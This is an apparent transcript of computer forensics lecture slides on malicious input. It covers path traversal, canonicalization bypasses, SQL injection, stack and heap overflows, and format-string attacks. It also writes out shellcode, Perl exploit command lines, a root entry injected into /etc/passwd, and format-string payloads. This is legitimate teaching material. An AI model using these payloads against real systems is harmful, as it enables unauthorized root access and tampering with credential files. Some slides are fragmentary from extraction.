Computer Forensics
1 / 97

Computer Forensics Use of Malicious Input - PowerPoint PPT Presentation

  • Updated On :

Computer Forensics Use of Malicious Input. Buffer and Heap Overflow Attacks. Standard Tool to Break Into Systems. Used for Access Escalation. Very Common. Prototype of an Attack Mode. Beware of User Input. Anonymous FTP should allow access to files selectively.

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
Download Presentation

PowerPoint Slideshow about 'Computer Forensics Use of Malicious Input' - conroy

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Slide1 l.jpg

Computer Forensics

Use of Malicious Input

Buffer and heap overflow attacks l.jpg
Buffer and Heap Overflow Attacks

  • Standard Tool to Break Into Systems.

  • Used for Access Escalation.

  • Very Common.

  • Prototype of an Attack Mode.

Beware of user input l.jpg
Beware of User Input

  • Anonymous FTP should allow access to files selectively.

  • One implementation parsed the file name.

  • Assume /pub/acc is an allowed directory.

  • Request: get /pub/acc/../../../etc/passwd

Beware of user input4 l.jpg
Beware of User Input

  • This implementation only parsed the first part of the string.

  • Decided access is OK

    • get /pub/acc/../../../etc/passwd

  • Allowed access to any file.

  • Took several versions before the security breach was firmly patched.

Morale l.jpg

  • Don’t reinvent the wheel.

    • Other implementations used a sandbox.

    • Community had learned how to get it right.

  • Parsing input is difficult.

    • Users have an incentive to be inventive.


All input is evil l.jpg

  • Canonical Representation Issues

    • Canonicalization: Translates name to standard representation.

  • Canonical Filenames

    • Napster Name Filtering.

    • Ordered to restrict access to certain songs.

    • Access was denied based on name of the song.

    • Users bypassed it with uncanonical song names

      • Deepest Chill  Deepest Chi11

      • Candyman  AndymanCay (in pig latin)

All input is evil7 l.jpg

  • Mac OS X and Apache Vulnerability

    • HFS+ is case insensitive.

    • Apache uses text-based configuration files, that are case sensitive, to determine

    • Disallow access to directory scripts:

<Location /scripts>

order deny, allow

deny from all


All input is evil8 l.jpg

  • Denies user request

  • Allows user request

All input is evil9 l.jpg

  • Sun StarOffice /tmp directory symbolic link vulnerability

  • Symbolic link: file that points to another file.

  • Symbolic links do not share access rights with the file they point to.

All input is evil10 l.jpg

  • Sun StarOffice creates file /tmp/soffice.tmp with 0777 access mask.

  • Attacker links /tmp/soffice.tmp to /etc/passwd.

  • Root runs StarOffice

  • Permissions on /etc/passwd would get changed to 0777.

Canonicalization issues l.jpg
Canonicalization Issues

  • Subsystems cooperate.

  • First subsystem does not canonicalize input in the way the second one does.

Canonicalization issues12 l.jpg
Canonicalization Issues

  • Common when software make decisions on file names

    • 8.3 representation of file names

    • IIS looks at extensions.

    • Request to ***.asp::$DATA is routed to asp.dll. But this is a NTFS stream, that sends the ASP source code to the user.

    • Trailing dots or slashes

      • “secretFile.doc.” is same as “secretFile.doc” for windows.

Canonicalization issues13 l.jpg
Canonicalization Issues

  • \\?\temp\myfile is the same as \temp\myfile

  • Directory traversal ../

  • AOL 5.0 parental controls:

    • Bypass restriction on URL by adding period to file name.

  • Secure IIS verifies incoming and outgoing data

    • Use hexcode: %64elete instead of delete for key words.

    • Use “%2e%2e/” for “../”

    • Two canonalization issues in Security Software!

  • Canonicalization issues14 l.jpg
    Canonicalization Issues

    • Lines with carriage returns:

      • Assume logging of file access:

      • Attacker accesses file:

      • Log entry: Mike 2004-02-19 13:02:12 file.txt

    file.txt\r\n127.0.0.1\tTom2004-02-19\t13:02:12\tsecret.doc Mike 2004-02-19 13:02:12 file.txt

    127.0.0. 1 Tom 2004-02-19 13:02:12 secret.doc

    Canonicalization issues15 l.jpg
    Canonicalization Issues

    • Escaping: Many ways to represent a character

      • US-ASCII

      • Hexadecimal escape codes

      • UTF-8 variable width encoding

      • UCS-2 Unicode encoding

      • HTML escape codes

    • Double Escaping

    Canonicalization issues16 l.jpg
    Canonicalization Issues

    • Homograph Attacks

    • Characters look the same, but are not

    • Latin letter “o”

    • Cyrillic character “o” (U+043E)

    Morale17 l.jpg

    • Software should not make decisions based on names.

    • If it has do, enforce name restrictions

    • Don’t trust relative paths.

    Data base inputs l.jpg
    Data Base Inputs

    • Don’t trust the user.

    • Data base access over the web lead to execution of sql code.

    • string sql = “select * from client where name = ‘” + name + “’”

    • Variable name provided by user

    • If name is Schwarz, this executes

    • string sql = “select * from client where name = ‘schwarz’”

    Data base inputs19 l.jpg
    Data Base Inputs

    • User enters:

      • Schwarz’ or 1=1 - -

    • The sql statement becomes

      • string sql = “select * from client where name = ‘schwarz’ or 1=1 - -”

    • Selects all clients

    • - - SQL comment, comments out everything behind.

    Final question l.jpg
    Final Question

    • You are running a crime lab. Per your order, all digital evidence is protected against alteration by using the MD5 hash algorithm. Suddenly, a program appears on the internet that takes an arbitrary number (of the right length) as input and generates a file with the MD5 hash value equal to the input.

      • All your digital evidence is now worthless, since you were not using the best method in order to safeguard your evidence, and other hashes such as SHA1, SHA252, etc. were known when you put this policy in place.

      • The quality of your chain-of-custody procedure can still be evaluation in court. The relative difficulty of generating meaningful files with the same MD5 value and the strength of the rest of your chain of evidence protection procedures argue in favor of the digital evidence processed by your crime-lab.

    Buffer overflow exploits and much more l.jpg
    Buffer Overflow Exploits and Much More

    • How do you break in?

    • In the following:

      • Overview of Buffer Overflow Exploits

      • Detailed Explanation of Buffer Overflow Exploits

      • Writing Shell-code

      • Heap exploits

    Buffer overflow attacks l.jpg
    Buffer Overflow Attacks

    • Stack: push and pop

    Buffer overflow attacks23 l.jpg
    Buffer Overflow Attacks

    • Memory used by a program is split into segments.

      • Data segment – global program variables

      • BSS segment – static program variables

      • Heap – dynamic program variables

      • Stack – procedure call data and local variables

    Buffer overflow attack l.jpg
    Buffer Overflow Attack

    int main(int argc, char* argv[])


    foo(argv[1]); return 0;


    void foo(const char* input)


    char buf[10];

    printf("Hello World\n");


    Buffer overflow attack25 l.jpg
    Buffer Overflow Attack

    int main(int argc, char* argv[]) {


    return 0;}

    void foo(const char* input)


    char buf[10];

    printf("Hello World\n");


    Buffer overflow attack26 l.jpg
    Buffer Overflow Attack

    • Works by overwriting the return address to jump somewhere else.

    Buffer overflow attack27 l.jpg
    Buffer Overflow Attack

    #pragma check_stack(off)

    #include <string.h>

    #include <stdio.h>

    void foo(const char* input) {

    char buf[10];

    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

    strcpy(buf, input);

    printf("%s\n", buf);

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); }

    Buffer overflow attack28 l.jpg
    Buffer Overflow Attack

    void bar(void)


    printf("Augh! I've been hacked!\n");


    Buffer overflow attack29 l.jpg
    Buffer Overflow Attack

    int main(int argc, char* argv[])


    printf("Address of foo = %p\n", foo);

    printf("Address of bar = %p\n", bar);

    if (argc != 2) {

    printf("Please supply a string as an argument!\n");

    return -1; }

    foo(argv[1]); return 0;


    Buffer overflow attack30 l.jpg
    Buffer Overflow Attack

    Chapter05>stackoverrun.exe Hello

    Address of foo = 00401000

    Address of bar = 00401050

    My stack looks like:








    Now the stack looks like:







    Buffer overflow attack31 l.jpg
    Buffer Overflow Attack

    Chapter05>stackoverrun.exe Hello

    Address of foo = 00401000

    Address of bar = 00401050

    My stack looks like:








    Now the stack looks like:







    Buffer overflow attack33 l.jpg
    Buffer Overflow Attack

    • If we overflow the buffer, then we overwrite the return address.

    • If we overwrite the return address, then (mostly), the memory location executed after the return does not belong to the program.

    • Segmentation Fault.

    • O.K., now we know how to write programs that crash!!!!!!!!

    Buffer overflow attack34 l.jpg
    Buffer Overflow Attack

    • By looking at the program and its output, we can write the address of bar into the return address.

    • This will cause the execution to go to bar.

    Buffer overflow attack35 l.jpg
    Buffer Overflow Attack

    Address of Bar

    Buffer overflow attack37 l.jpg
    Buffer Overflow Attack

    • This is fun, but useless.

    • Real attack: overwrite return address so that code execution jumps into the input given by attacker.

    Buffer overflow attack38 l.jpg
    Buffer Overflow Attack

    • To protect against signatures, structure input

      • Varying stuff

      • execve(/bin/sh) (gives new shell with program privileges in UNIX)

      • Pointer to execve statement.

    Buffer overflow attack39 l.jpg
    Buffer Overflow Attack

    • Finding vulnerabilities

      • Script-kiddies scan target with automated tool.

      • Tool creator has detailed analysis of vulnerabilities.

        • Look for strcpy, gets, getws, memcpy memmove, scanf, …

      • Alternatively, just cram the application until it crashes.

        • Crash used to give you locations of registers.

    Buffer overflow attack40 l.jpg
    Buffer Overflow Attack

    • Example: Cram in lots of input of As.

    • Program crashes, EIP has value 41414141.

    • Sign of buffer overflow.

    • Now try to feed more specific input.

    Buffer overflow attack42 l.jpg
    Buffer Overflow Attack

    • Attack signature can be used by IDS.

    • Vary the NOP commands.

    • Many alternatives.

    Buffer overflow attack43 l.jpg
    Buffer Overflow Attack

    • Protection

      • Make stack non-executable.

      • Use canary birds.

    Buffer overflow attack44 l.jpg
    Buffer Overflow Attack

    • Stack Guard

    • MS Visual Studio

      use canaries.

    Buffer overflow attack45 l.jpg
    Buffer Overflow Attack

    • MS Outlook

      Vcard: Virtual business card

      buffer overflow vulnerability.

    • IIS 5

    • Internet Printing Protocol

    Heap overflow attack l.jpg
    Heap Overflow Attack

    • These protections do not apply to heaps, where dynamically allocated memory resides.

    • Some of this memory contains the addresses of functions that are going to be called.

    • Harder to find, harder to protect against.

    Remember l.jpg

    People attack computer systems because they can.

    Final question48 l.jpg
    Final Question

    • You find evidence of a crime on a system that you are administering. However, in finding and collecting the evidence, you violated the law. You feel strongly about the case and hence you send the evidence anonymously to the police who use this to investigate the perpetrator. Is the collected evidence admissible in a court of law?

      • No, you obtained the material without proper authorization and therefore violated constitutional protection.

      • No, it needed to be collected in a forensically sound manner, which you did not do since you did not pay attention in class.

      • Yes, you were not acting as an agent of the government and the constitutional amendments protect only against actions by government.

      • Yes, since the evidence came from a system that the perpetrator did not own.

    Buffer overflow details l.jpg
    Buffer Overflow Details

    • This function just mismanages the stack:

    int main ( int argc, char* argv[])

    { char buffer[500];

    strcpy(buffer, argv[1]);

    return 0;


    Buffer overflow attack details l.jpg
    Buffer Overflow Attack Details

    • Assume that this program is a suid root program:

    $ sudo chown root vuln

    $ sudo chmod +s vuln

    $ ls –l vuln

    -rwsr-sr-x 1 root linuxUser 4934 May

    Buffer overflow attack details51 l.jpg
    Buffer Overflow Attack Details

    • We need three ingredients to break this code:

      • NOP sled

      • Shell-code

        • Assembly language code that spawns a shell

      • Return address (into the beginning of the overflowing buffer)

        • Need to guess approximate location of the buffer

        • Use current stack pointer to estimate beginning of buffer

    Buffer overflow attack details52 l.jpg
    Buffer Overflow Attack Details

    • Put shell code into a file (called shellcode)

    • Use Perl scripting to provide input.

    • *nix example:

      • $ ./vuln ‘perl –e `print “\x90”x202;``cat shellcode` `perl –e print “\x78\xf9\xff\xbf”x88

        • For this to work, the return address must be correctly aligned

        • In this case, the shell code has 42B.

        • NOP sled + shell code = 244B = 61 words, which leads to correct alignement.

      • Using the ` character (under tilde) gives command substitution

    Buffer overflow attack details53 l.jpg
    Buffer Overflow Attack Details

    • In the previous example, the buffer was big enough to contain the nop sled, the shell code and a bunch of return addresses.

    • If the buffer is small, we can use environmental variables.

    Buffer overflow attack details54 l.jpg
    Buffer Overflow Attack Details

    • Assume that we have this suid program:

    int main(int argc, char argv[]) {

    char buffer[5];


    return 0;


    Buffer overflow attack details55 l.jpg
    Buffer Overflow Attack Details

    • In this example, the buffer is too small to contain the shell code.

    • Strategy:

      • Place the shell code into the heap.

      • Fill the entire buffer with a return address that points to the shell code.

    Buffer overflow attack details56 l.jpg
    Buffer Overflow Attack Details

    • In the bash shell

      • Create an environmental variable containing the shell code.

      • Calculate the address of the environmental variable.

      • Overflow the buffer with the address of that environmental variable.

    Buffer overflow attack details57 l.jpg
    Buffer Overflow Attack Details

    • In the bash shell, set environmental variable with export VARNAME = variable

      • $ export SHELLCODE=`perl –e ‘print “\x90”x100;’ ` cat shellcode ‘

    Buffer overflow attack details58 l.jpg
    Buffer Overflow Attack Details

    • To find the address of this environmental variable

      • Use gdb

        • Set breakpoint right at the beginning of program

        • Use the gdb command x/20s $esp

          • To see strings in stack memory

          • Look for “SHELLCODE =“

        • Once the shellcode is located, figure out an address that leads to the NOP sled

    Buffer overflow attack details59 l.jpg
    Buffer Overflow Attack Details

    • To find the address of this environmental variable

      • Use a program that calls getenv(SHELLCODE) and returns the value

        • printf(“address is %p\n”,getenv(SHELLCODE));

      • Calculate the address of SHELLCODE

    • This allows us to eliminate the NOP sled

    Writing shell code l.jpg
    Writing Shell Code

    • Shell Code needs to call

      • execve()

      • setreuid()

        • To restore root privileges after they are dropped.

        • (Recall: we are using a suid program, they might drop root privileges).

    Writing shell code61 l.jpg
    Writing Shell Code

    • System level calls are made with an interrupt

      • int 0x80

      • Parameters are put into registers.

    Writing shell code62 l.jpg
    Writing Shell Code

    • setreuid:

    mov eax, 70; syscall number is 70

    mov ebx, 0; real uid set to root

    mov ecx, 0; set effective uid to root

    int 0x80

    Writing shell code63 l.jpg
    Writing Shell Code

    section .data

    filepath db “/bin/shXAAAABBBB”

    section .text

    mov eax, 0;

    mov ebx, filepath

    mov [ebx+7], al

    mov[ebx+8], ebx

    mov [ebx+12] ,eax

    mov eax, 11; since execve is syscall 11

    lea ecx, [ebx+8]; load ecx with command addr

    lea edx, [ebx+12]; load edx with second para. 0

    int 0x80

    • execve

    ebx points to




    where aaaa is the address of /bin/sh


    since eax contains 0000

    Writing shell code64 l.jpg
    Writing Shell Code

    • This program spawns a shell.

      • But string is still contained in the data segment.

      • This will not work if shell code needs to be injected into existing code.

    Writing shell code65 l.jpg
    Writing Shell Code

    • Using EIP

      • A call instruction will load the EIP with a memory address.

      • The address of the next instruction, the return address, is pushed on the stack.

      • Call trick:

        • Jump to the end of the code.

          • (The string follows the end of the code.)

        • Make a call to the beginning of the code.

        • Remove the return address from the stack

    Writing shell code66 l.jpg
    Writing Shell Code

    ebx contains the address of the string

    jmp two


    pop ebx

    <program code here>


    call one

    db ‘/bin/sh0’

    Stack after call one:

    Writing shell code67 l.jpg
    Writing Shell Code

    • Put everything together and you have shell code.

    • If you look at it in hex, you will see:

    B8 46 00 00 00 BB 00 00 00 00 B9 00 00 00 00 CD

    80 EB 1C 5B B8 00 00 00 00 88 43 07 89 5B 08 89

    43 0C B8 0B 00 00 00 8D 4B 08 8D 53 0C CD 80 E8



    Writing shell code68 l.jpg
    Writing Shell Code

    • If you give zeroes as input, any self-respecting C-string function will assume the end of string.

    • Some of the zeroes come from using the parameter zero.

      • To load register eax with zero, use

        • xor eax, eax

    • Sometimes, a zero byte is part of a parameter.

      • Load only half of a register:

      • Replace

        • mov eax, 70

      • with

        • xor eax, eax

        • mov al, 70

    Writing shell code69 l.jpg
    Writing Shell Code

    • Polymorphic Shell Code

      • IDS can look for shell code signature

      • IDS could insist on all input being printable.

        • Make shell code that only consists of printable characters.

        • Bigger and harder to do, but possible.

        • Phiral Research Laboratories has a tool called dissembler that translates byte code into byte code that is printable.

    Heap buffer overflow attack l.jpg
    Heap Buffer Overflow Attack

    • Are not standardized such as buffer overflow attacks.

    • Need to find something important in the heap that is stored after an over-flowable buffer.

      • An important variable

        • User permissions

        • Authentication status

      • A function pointer

    Heap buffer overflow attack71 l.jpg
    Heap Buffer Overflow Attack

    Program appends userinput (up to 19B) into a file called “/tmp/notes”

    Heap buffer overflow attack72 l.jpg
    Heap Buffer Overflow Attack

    • Memory for *userinput is located before *outputfile

    • Distance between the two is 24

      • As revealed by debugging

      • As revealed by inputting successively longer strings.

        • Up to 23B input is tolerated.

          • Remember to add the additional zero

    Heap buffer overflow attack73 l.jpg
    Heap Buffer Overflow Attack

    • Assume that this is a suid program

    Heap buffer overflow attack74 l.jpg
    Heap Buffer Overflow Attack

    • How do we overflow the heap?

      • Input 12345678901234567890123testfile

        • Writes to testfile instead.

        • Testfile contains

          • 12345678901234567890123testfile

    Heap buffer overflow attack75 l.jpg
    Heap Buffer Overflow Attack

    • Can use the same trick to append to the password file.

      • Problem: Need to craft the entry to fit.

      • Desired entry:

        • myroot::0:0:me:/root: /bin/bash

      • However, somewhere there we have to get an /etc/passwd in.

      • Solution: Use a symbolic link

    Heap buffer overflow attack76 l.jpg
    Heap Buffer Overflow Attack

    • Create a symbolic link so that an entry can be both a shell and end in /etc/passwd:

    Heap buffer overflow attack77 l.jpg
    Heap Buffer Overflow Attack

    • This means that this is a valid password file line:

      • myroot::0:0:me:/root:/tmp/etc/passwd

    • Now we need to modify this string so that /etc/passwd start with byte 24

      • myroot::0:0:m:/root:/tmp/etc/passwd works.

    Heap buffer overflow attack78 l.jpg
    Heap Buffer Overflow Attack

    • This is a fairly contrived example, but explains the ideas well.

    Format string vulnerability l.jpg
    Format String Vulnerability

    • A programmer shortcut uses

      • printf(string);

        instead of

      • printf(“%s”,string);

        This works fine, unless the string itself becomes a format string.

    Format string vulnerability80 l.jpg
    Format String Vulnerability

    • Assume we have the following line:

      • printf(argv[1]);

      • Input testing%x and obtain:

        • testingbffff5a0

          • bffff5a0 is a value on the stack.

        • Now we can read the stack by inputing

          • %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x. %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.

        • This is because the printf call will take its parameters from the stack.

    Format string vulnerability81 l.jpg
    Format String Vulnerability

    • If we look far enough down the stack, we will find the string that we used as input.

    Format string vulnerability82 l.jpg
    Format String Vulnerability

    • Assume we put in AAAA%08x.%08x.%08x.%08x.

    • Output is


    • The 41-s are the beginning of the string.

    • If the fourth parameter would be displayed using the %s format, then the function will read the memory at that address!

    Format string vulnerability83 l.jpg
    Format String Vulnerability

    • If we put in an arbitrary memory address, then we would get a segmentation fault.

    • But not if we take a valid memory address:

    Format string vulnerability84 l.jpg
    Format String Vulnerability

    • Input \x14\xfd\xff\xbf.%x%x%x%s

    • Result is the contents at memory location bf ff fd 14.

    • Now we can read from any memory within the scope of the process!

    Format string vulnerability85 l.jpg
    Format String Vulnerability

    • But we can even write to arbitrary memory!

    • %n

      • prints out number of bytes written out so far.

      • It also writes data.

      • Expects a memory address

      • Writes number of bytes so far written into that memory address.

    Format string vulnerability86 l.jpg
    Format String Vulnerability

    • Input

      • \x70\x95\x04\x08%08x.%08x.%08x.%n

    • Output bffff590.000003e8.000003e8

    • But also sets content at 0x08049570 to 30.

    • This allows us to write small values to arbitrary memory belonging to the process.

    • One can now write individual bytes by using the width field in front of %n:

    Return into libc l.jpg
    Return into Libc

    • Making the stack non-executable will stop the bulk of buffer overflow attacks.

    • OpenBSD among others has a non-executable stack by default.

    • But these architecture can still be exploited with a “return to libc”.

    Return into libc88 l.jpg
    Return into Libc

    • Basic vulnerable code:

    Return into libc89 l.jpg
    Return into Libc

    • Use “system” in the C-library.

    • system(/bin/sh); spawns shell.

    • Use gdb to find where system is by debugging a simple program such as

    Return into libc90 l.jpg
    Return into Libc

    • The address of system( ) will vary from system to system, but is constant for each system.

    Return into libc91 l.jpg
    Return into Libc

    • To call system(“/bin/sh”), we need to provide it with parameters.

    • We need a pointer to /bin/sh.

    Return into libc92 l.jpg
    Return into Libc

    • system() address is 0x42049e54

    • /bin/sh address is 0xbffffc40

    • Therefore, input

    Return into libc93 l.jpg
    Return into Libc

    • First 28 B are just filler

    • The address of system

    • Return address is not used

    • Argument for system

    Return into libc94 l.jpg
    Return into Libc

    • This will spawn a cell, but not at root level.

    • Can use a previous call to setuid followed by system.

    • Chaining of libc calls.

    Return into libc95 l.jpg
    Return into Libc

    • Better:

      • Use a wrapper program to be executed by the vulnerable program.

      • Wrapper is simple:

      • Wrapper is executed at the privilege level of the vulnerable program, i.e. with root.

      • Unfortunately, it system(/bin/sh) still drops privileges.

    Return into libc96 l.jpg
    Return into Libc

    • Ultimate solution:

      • Use execl( ) instead of system( ).

      • Since execl( ) expects parameters that should be zero (and zeroes terminate a string), we need various tricks to put strings into memory.

    Bibliography l.jpg

    • Jon Erickson: Hacking, The art of exploitation, No Starch Press, 2003

      • Used throughout the last part of this presentation